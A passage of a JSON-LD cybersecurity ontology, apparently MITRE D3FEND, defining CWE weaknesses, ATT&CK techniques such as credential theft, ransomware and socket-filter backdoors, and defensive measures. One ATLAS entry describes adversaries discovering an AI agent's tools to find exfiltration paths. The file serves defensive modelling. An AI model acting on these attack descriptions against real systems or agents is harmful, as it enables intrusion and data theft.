        {
          "@id": "_:Na375354de51b4de5b5cc96cbd2c3dcf1"
        },
        {
          "@id": "_:N24176e145d4144b8ad97900277d1b45c"
        }
      ]
    },
    {
      "@id": "_:Ne2694d4c1e8c48fdbf2b9eac23cd4db2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "_:Nfab04cc48cb84fbb9e81e09759cfd447",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:Na375354de51b4de5b5cc96cbd2c3dcf1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationLog"
      }
    },
    {
      "@id": "_:N24176e145d4144b8ad97900277d1b45c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:CWE-515",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-515",
      "d3f:definition": "A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information.",
      "rdfs:label": "Covert Storage Channel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-514"
      }
    },
    {
      "@id": "d3f:CWE-915",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-915",
      "d3f:definition": "The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.",
      "d3f:synonym": [
        "AutoBinding",
        "Mass Assignment",
        "PHP Object Injection"
      ],
      "rdfs:label": "Improperly Controlled Modification of Dynamically-Determined Object Attributes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-913"
      }
    },
    {
      "@id": "d3f:AccountLocking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AccountLocking"
      ],
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-AL",
      "d3f:definition": "The process of temporarily disabling user accounts on a system or domain.",
      "d3f:disables": {
        "@id": "d3f:UserAccount"
      },
      "d3f:kb-article": "## How it works\nManagement servers with enterprise policies for account management provide the ability to enable and disable account for given rules. The rules may include specific periods of time (eg. weekend, plant shutdown, leave periods), specific user types or groups, or individual users.\n\n## Considerations\n* Local accounts caches vs centralized account management\n* Single Sign-on\n* Role based vs Attribute based systems\n\n## Examples of account configuration stores\n* Directory Services\n* Active Directory\n* RADIUS\n* LDAP\n* Oracle User Account Management\n* JumpCloud",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AccountMonitoring_ForescoutTechnologies"
        },
        {
          "@id": "d3f:Reference-FrameworkForNotifyingADirectoryServiceOfAuthenticationEventsProcessedOutsideTheDirectoryService_OracleInternationalCorp"
        }
      ],
      "rdfs:label": "Account Locking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialEviction"
        },
        {
          "@id": "_:Nfe1b1c319e1a47a2a5a5ab380289365f"
        }
      ]
    },
    {
      "@id": "_:Nfe1b1c319e1a47a2a5a5ab380289365f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:NetworkFlow",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A summarization of network transactions between a client and server. It often summarizes bytes sent, bytes received, and protocol flags.",
      "d3f:summarizes": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Network Flow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Na44e988782a94cc3ba733731de108416"
        }
      ]
    },
    {
      "@id": "_:Na44e988782a94cc3ba733731de108416",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:summarizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:KernelModuleLoadEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the loading of a kernel module, such as a device driver or dynamically linked extension, into the operating system kernel to extend or modify its capabilities.",
      "rdfs:label": "Kernel Module Load Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KernelModuleEvent"
        },
        {
          "@id": "_:Naf2a1525de914e0c8eacceab6804431d"
        }
      ]
    },
    {
      "@id": "_:Naf2a1525de914e0c8eacceab6804431d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:CWE-456",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-456",
      "d3f:definition": "The product does not initialize critical variables, which causes the execution environment to use unexpected values.",
      "rdfs:label": "Missing Initialization of a Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-909"
      }
    },
    {
      "@id": "d3f:CCI-001310_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:DatabaseQueryStringAnalysis"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system checks the validity of organization-defined inputs.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001310"
    },
    {
      "@id": "d3f:OTPauseCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a device to pause a service/program.",
      "rdfs:label": "OT Pause Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:N1ad37f06b98c469a98d015268e364819"
        },
        {
          "@id": "_:Na19aab4b95c146d6a2b5624344be2f0c"
        },
        {
          "@id": "_:N12df903481d444b0a1b5fc06c469e9af"
        }
      ]
    },
    {
      "@id": "_:N1ad37f06b98c469a98d015268e364819",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:Na19aab4b95c146d6a2b5624344be2f0c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTPauseCommand"
      }
    },
    {
      "@id": "_:N12df903481d444b0a1b5fc06c469e9af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommandEvent"
      }
    },
    {
      "@id": "d3f:CWE-22",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-22",
      "d3f:definition": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.",
      "d3f:synonym": [
        "Directory traversal",
        "Path traversal"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-668"
        },
        {
          "@id": "d3f:CWE-706"
        },
        {
          "@id": "_:Ne450a74dc9fa4f19a0da72e73270a75a"
        }
      ]
    },
    {
      "@id": "_:Ne450a74dc9fa4f19a0da72e73270a75a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:T0874",
      "@type": "owl:Class",
      "d3f:attack-id": "T0874",
      "d3f:definition": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Hooking - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSExecutionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPrivilegeEscalationTechnique"
        }
      ],
      "skos:prefLabel": "Hooking"
    },
    {
      "@id": "d3f:Reference-PublicKeyPinningExtensionForHTTP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc7469"
      },
      "d3f:kb-abstract": "RFC 7469 describes an HTTP extension that allows web host operators to instruct user agents to remember ('pin') the hosts' cryptographic identities over a period of time. This decreases the risk of MITM attacks due to compromised Certificate Authorities.",
      "d3f:kb-author": "C. Evans, C. Palmer, R. Sleevi",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:CertificatePinning"
      },
      "d3f:kb-reference-title": "Public Key Pinning Extension for HTTP",
      "rdfs:label": "Reference - Public Key Pinning Extension for HTTP"
    },
    {
      "@id": "d3f:AML.T0084.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084.001",
      "d3f:definition": "Adversaries may discover the tools the AI agent has access to. By identifying which tools are available, the adversary can understand what actions may be executed through the agent and what additional resources it can reach. This knowledge may reveal access to external data sources such as OneDrive or SharePoint, or expose exfiltration paths like the ability to send emails, helping adversaries identify AI agents that provide the greatest value or opportunity for attack.",
      "rdfs:label": "Tool Definitions - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0084"
      },
      "skos:prefLabel": "Tool Definitions"
    },
    {
      "@id": "d3f:MemoryExtent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A memory extent is a defined, contiguous region of memory within a computing system, characterized by its size, location, and purpose. It represents an abstraction of physical or virtual memory used for storing data, instructions, or other computational artifacts.",
      "rdfs:label": "Memory Extent",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:TA0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:\n\nSYSTEM/root level\nlocal administrator\nuser account with admin-like access\nuser accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.",
      "d3f:display-order": 4,
      "rdfs:label": "Privilege Escalation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:DatabaseServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DatabaseApplication"
      },
      "d3f:definition": "A database server is a server which uses a database application that provides database services to other computer programs or to computers, as defined by the client-server model. Database management systems (DBMSs) frequently provide database-server functionality, and some database management systems (such as MySQL) rely exclusively on the client-server model for database access (while others e.g. SQLite are meant for using as an embedded database). For clarification, a database server is simply a server that maintains services related to clients via database applications.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Database_server"
      },
      "rdfs:label": "Database Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:N3cf6af48d9104ff5b97e53a84f687183"
        }
      ],
      "skos:altLabel": "Network Database Resource"
    },
    {
      "@id": "_:N3cf6af48d9104ff5b97e53a84f687183",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseApplication"
      }
    },
    {
      "@id": "d3f:FileTransferNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "File transfer network traffic is network traffic related to file transfers between network nodes. This includes only network traffic conforming to standard file transfer protocols, not custom transfer protocols.",
      "rdfs:label": "File Transfer Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1574.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1574.014",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains)",
      "rdfs:label": "AppDomainManager",
      "rdfs:subClassOf": {
        "@id": "d3f:T1574"
      }
    },
    {
      "@id": "d3f:T1546.011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.011",
      "d3f:creates": {
        "@id": "d3f:Shim"
      },
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)",
      "d3f:modifies": {
        "@id": "d3f:ShimDatabase"
      },
      "rdfs:label": "Application Shimming",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Nd878d20d556a450093c0d99158629b25"
        },
        {
          "@id": "_:N4246d13bf7124c39addc2a4cdb10ac97"
        }
      ]
    },
    {
      "@id": "_:Nd878d20d556a450093c0d99158629b25",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Shim"
      }
    },
    {
      "@id": "_:N4246d13bf7124c39addc2a4cdb10ac97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShimDatabase"
      }
    },
    {
      "@id": "d3f:CWE-599",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-599",
      "d3f:definition": "The product uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements.",
      "rdfs:label": "Missing Validation of OpenSSL Certificate",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-295"
      }
    },
    {
      "@id": "d3f:Reference-RevokingaPreviouslyIssuedVerifiableCredential-Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/azure/active-directory/verifiable-credentials/how-to-issuer-revoke"
      },
      "d3f:kb-author": "Barclay Neira, Christer Ljung, Juan Camilo Ruiz, John Flores",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialRevocation"
      },
      "d3f:kb-reference-title": "Revoke a previously issued verifiable credential",
      "rdfs:label": "Reference - Revoke a previously issued verifiable credential - Microsoft"
    },
    {
      "@id": "d3f:DNSNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "DNS network traffic is network traffic related to queries and responses involving the Domain Name System. DNS traffic can involve clients, servers such as relays or resolvers. This includes only network traffic conforming to standard DNS protocol; not custom protocols.",
      "rdfs:label": "DNS Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1583.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1583.005",
      "d3f:definition": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)",
      "rdfs:label": "Botnet",
      "rdfs:subClassOf": {
        "@id": "d3f:T1583"
      }
    },
    {
      "@id": "d3f:CWE-1298",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1298",
      "d3f:definition": "A race condition in the hardware logic results in undermining security guarantees of the system.",
      "rdfs:label": "Hardware Logic Contains Race Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:GroupPolicy",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Group Policy is a feature of the Microsoft Windows NT family of operating systems that controls the working environment of user accounts and computer accounts. Group Policy provides the centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. A version of Group Policy called Local Group Policy (\"LGPO\" or \"LocalGPO\") also allows Group Policy Object management on standalone and non-domain computers.",
      "rdfs:label": "Group Policy",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:T1555",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:PasswordStore"
      },
      "d3f:attack-id": "T1555",
      "d3f:definition": "Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.",
      "d3f:may-access": {
        "@id": "d3f:DatabaseFile"
      },
      "rdfs:label": "Credentials from Password Stores",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Nc76efc4c67514228b296678d79461838"
        },
        {
          "@id": "_:N913af1763c0b4c3591eb78db019674ec"
        }
      ]
    },
    {
      "@id": "_:Nc76efc4c67514228b296678d79461838",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordStore"
      }
    },
    {
      "@id": "_:N913af1763c0b4c3591eb78db019674ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseFile"
      }
    },
    {
      "@id": "d3f:T1127",
      "@type": "owl:Class",
      "d3f:attack-id": "T1127",
      "d3f:definition": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
      "rdfs:label": "Trusted Developer Utilities Proxy Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:GroupManagementEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the creation, modification, or deletion of a group, or changes to its membership and privileges. Group management events facilitate the enforcement of role-based access control by organizing users and permissions into logical units for streamlined administration and policy enforcement.",
      "rdfs:label": "Group Management Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/group_management"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N42c8133f871947528bd10bbe6d0e868c"
        }
      ]
    },
    {
      "@id": "_:N42c8133f871947528bd10bbe6d0e868c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlGroup"
      }
    },
    {
      "@id": "d3f:T1499",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499",
      "d3f:definition": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)",
      "rdfs:label": "Endpoint Denial of Service",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002530_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:Hardware-basedProcessIsolation"
        },
        {
          "@id": "d3f:Kernel-basedProcessIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains a separate execution domain for each executing process.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002530"
    },
    {
      "@id": "d3f:T1205.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1205.002",
      "d3f:definition": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.",
      "rdfs:label": "Socket Filters",
      "rdfs:subClassOf": {
        "@id": "d3f:T1205"
      }
    },
    {
      "@id": "d3f:FastSymbolicLink",
      "@type": "owl:Class",
      "d3f:definition": "Fast symbolic links, allow storage of the target path within the data structures used for storing file information on disk (e.g., within the inodes). This space normally stores a list of disk block addresses allocated to a file. Thus, symlinks with short target paths are accessed quickly. Systems with fast symlinks often fall back to using the original method if the target path exceeds the available inode space.",
      "owl:disjointWith": {
        "@id": "d3f:SlowSymbolicLink"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Symbolic_link#Storage_of_symbolic_links"
      },
      "rdfs:label": "Fast Symbolic Link",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Symbolic_link#Storage_of_symbolic_links"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UnixLink"
        }
      ],
      "skos:altLabel": "Fast Symlink"
    },
    {
      "@id": "d3f:Reference-CManualIntegerInitialization_GNU",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.gnu.org/software/gnu-c-manual/gnu-c-manual.html#Integer-Types"
      },
      "d3f:kb-organization": "GNU",
      "d3f:kb-reference-of": {
        "@id": "d3f:VariableInitialization"
      },
      "d3f:kb-reference-title": "Integer Initialization in C",
      "rdfs:label": "Reference - Integer Initialization - GNU C Manual"
    },
    {
      "@id": "d3f:CWE-1123",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1123",
      "d3f:definition": "The product uses too much self-modifying code.",
      "rdfs:label": "Excessive Use of Self-Modifying Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:Reference-Reputation_of_an_entity_associated_with_a_content_item",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20060253584A1"
      },
      "d3f:kb-author": "Christopher Dixon, Thomas Pinckney",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileHashReputationAnalysis"
      },
      "d3f:kb-reference-title": "Reputation of an entity associated with a content item",
      "rdfs:label": "Reference - Reputation of an entity associated with a content item"
    },
    {
      "@id": "d3f:T1537",
      "@type": "owl:Class",
      "d3f:attack-id": "T1537",
      "d3f:definition": "Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.",
      "rdfs:label": "Transfer Data to Cloud Account",
      "rdfs:subClassOf": {
        "@id": "d3f:ExfiltrationTechnique"
      }
    },
    {
      "@id": "d3f:RestoreDiskImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreDiskImage"
      ],
      "d3f:d3fend-id": "D3-RDI",
      "d3f:definition": "Restoring a previously captured disk image a hard drive.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "rdfs:label": "Restore Disk Image",
      "rdfs:subClassOf": {
        "@id": "d3f:RestoreObject"
      }
    },
    {
      "@id": "d3f:T1486",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1486",
      "d3f:definition": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)",
      "d3f:encrypts": {
        "@id": "d3f:File"
      },
      "d3f:uses": {
        "@id": "d3f:CryptographicKey"
      },
      "rdfs:label": "Data Encrypted for Impact",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ImpactTechnique"
        },
        {
          "@id": "_:N180c7305e2f14b2da1999fc28a78da94"
        },
        {
          "@id": "_:N3eb3f08cfde546a19ea6f691d8a10574"
        }
      ]
    },
    {
      "@id": "_:N180c7305e2f14b2da1999fc28a78da94",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:encrypts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N3eb3f08cfde546a19ea6f691d8a10574",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:NetworkEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving network communications within or between digital systems.",
      "rdfs:label": "Network Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/categories/network"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N220358c0e74445ea8ca4c62247b8abaf"
        }
      ]
    },
    {
      "@id": "_:N220358c0e74445ea8ca4c62247b8abaf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:related",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x related y: x has a symmetric associative relation to y.",
      "rdfs:isDefinedBy": {
        "@id": "skos:related"
      },
      "rdfs:label": "related",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:ExternalContentInclusionFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "A subroutine which handles a content inclusion directive from an original file. When invoked, the external content is included in the resulting open file.",
      "rdfs:label": "External Content Inclusion Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N7f63781581f54263a723227d671be52d"
        }
      ]
    },
    {
      "@id": "_:N7f63781581f54263a723227d671be52d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-432",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-432",
      "d3f:definition": "The product uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running.",
      "rdfs:label": "Dangerous Signal Handler not Disabled During Sensitive Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-364"
      }
    },
    {
      "@id": "d3f:ShadowStack",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:copy-of": {
        "@id": "d3f:CallStack"
      },
      "d3f:definition": "A shadow stack is a mechanism for protecting a procedure's stored return address, such as from a stack buffer overflow. The shadow stack itself is a second, separate stack that \"shadows\" the program call stack. In the function prologue, a function stores its return address to both the call stack and the shadow stack. In the function epilogue, a function loads the return address from both the call stack and the shadow stack, and then compares them. If the two records of the return address differ, then an attack is detected.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Shadow_stack"
      },
      "rdfs:label": "Shadow Stack",
      "rdfs:subClassOf": [
        {
